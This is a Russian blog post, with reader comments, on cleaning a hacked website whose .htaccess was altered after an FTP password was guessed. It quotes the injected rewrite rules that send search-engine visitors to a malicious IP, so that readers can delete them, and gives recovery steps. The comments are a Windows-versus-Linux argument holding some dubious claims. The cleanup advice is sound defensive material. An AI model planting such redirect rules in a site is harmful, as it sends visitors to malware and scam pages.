Как вылечить перенаправление на вредоносные сайты

Решила написать о недавнем взломе сайта моей знакомой. Звонит мне Ира, говорит, трафик (посещаемость) на ее сайте резко снизился, чуть ли не до нуля – нажимаешь на какие-то ссылки на сайте – открываются не нужные страницы – загружаются вредоносные сайты, появляются новые папки на хостинге в ее сайте – в общем - ужас какой-то.

Когда пользователи открывают ее сайт – их просят установить антивирус и говорят, что сайт заражен программами-шпионами.

Если щелкнуть на картинку-ссылку левой кнопкой и посмотреть путь на зараженном сайте – появляется не обычный путь размещения картинки, а строка вида –

http : / / spyware-software.info/0/go.php?sid=2

Нашли информацию – это взлом FTP (подобранный пароль, если он несложный) и файла .htaccess, который обычно находится на один уровень выше на хостинге, чем папка /public html. Нужно открыть Блокнотом файл .htaccess и удалить оттуда строки типа:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://XX.XXX.XXX.XX/in.html?s=ipw2 [R,L]

Сам файл .htaccess удалять не нужно. Даже если в нем после удаления вредоносного кода ничего нет. Просто оставьте пустой файл и выставьте права доступа к файлу .htaccess «644». (Каждый может этот файл прочитать – но перезаписывать – только владелец сайта).

Мы поменяли пароль на FTP – выбрали самый сложный. Антивирус обновили, проверили компьютер. И не стали запоминать пароли в VC и Dreamweaver. Сайт полностью перезалили с резервной копии – сначала стираешь все файлы в папке /public html (папке хранения сайта – для форматирования), а потом записываешь все новые файлы с резервной копии. Сейчас все нормально.
Я надеюсь, вы не забываете делать резервные копии вашего сайта? :)

Нда.. однако.. =)
Вирусы...
Нина, есть операционные системы, в которых вирусы - не живут. Как вам такая новость? =)
Да и программы там есть все необходимые для работы, бесплтано. Хотите офис, или для графики что-нибудь.. И платные есть, по мере необходимости, потребности. Драйверов ненужно никаких. Обновления системы делается легко, если рядом интернет. Даже кодеки на халяву без лишних телодвижений можно установить, все самое свежее, - одним кликом по мышке.

О правильном хостинге нужно заботиться в вашея говорю о профессиональном хостинге, который стоит на Unix. Все что работает на Unix, в Windows - всего лишь эмуляция. Вы изначально воспринимаете ОС такой, какая она есть. А, какая же она есть на самом деле? Вот вам подсовывают Windows и для вас "компьютер и вирус" это синоним.

Главное отличие Windows от Unix (и им подобным) состоит в том, что Windows не имеет разделений между процессами. Любой процесс задачи можно обойти любым другим процессом. Прав на файл у пользователей Windows вообще нет, а потому владельцем может быть кто угодно. В Unix - имеется жёская динамичная архитектура прав, которую никто никогда не отменял.

По этому, атрибуты типа -- 644 на Windows-сервере, это всего лишь эмуляция Unix. В то время, как в действительности, файловая система Windows не гарантирует того, какие атрибуты вы прописываете.


Цитата:

Умняка прокатил?

Ты вот скажи что, линукс может предложить карпарациям?
Что линукс может предложить рабочим группам?
Что линукс может предложить простым людям? а не заумным?
И почему апачь делаеться под виндовс а iis под линукс не делаеться?

Да потому что виндовс лучше, в 10 тысячь раз!!!
Его популярность говорит об этом. А вирусы пишуться теми кто пишет антивирусы, и линуксоидами обиженными на винду!

Молодые люди!!! апаче под линуксом стоит, с тех когда линукс преобразился в графическою оболочку и работает на много быстрее чем виндоский апаче. Просто линукс сначала был чиста кровный сервер, аж потом со временем он отправился к людям. И зайти на сервер с под линукса на линукс не легко, а с под виндоса на сервер линус не возможно(файловая система разная), а вот с линукса на виндос(фунци есть для копирование виндоских разделов ) не составит труда для хакера который только учится. Хотя и говорят, что для взлома сайта не имеет значение, однако большинства серверов предпочитают линукс. А самая КРУТАЯ ОПЕРАЦИОННАЯ это которую на писал ты сам. И кто не согласен, пусть подумает хорошенько.

Maksir, линуксоид обиженный на винду - тупой ламер.
У каждой оси свои плюсы и надо использовать их на своё благо.
В винде играть, в linux юзать сервера и т.д. - глупо говорить что какая то ось круче =))
А популярность винды говорит лишь о раскрутке манагерами корпорации своих продуктов, линукс же продукт в основном бесплатный и его популярность говорит лишь о его достоинствах.
Я оч часто юзаю виндовс - в ней много сред разработки которые удобней чем в линукс.
но серверная часть наоборот

Цитата:

Спасибо за информацию. Вирусов эксплоитов всяких сейчас расплодилось много...

А если покупать его на долго хватит?

________________________
http://www.brandprint.ru/faksimile/

Недавно был и у меня завирусован файл .htaccess. Сразу же удалил вирусный файл и загрузил свой. Файл .htaccess у меня такой:


Код: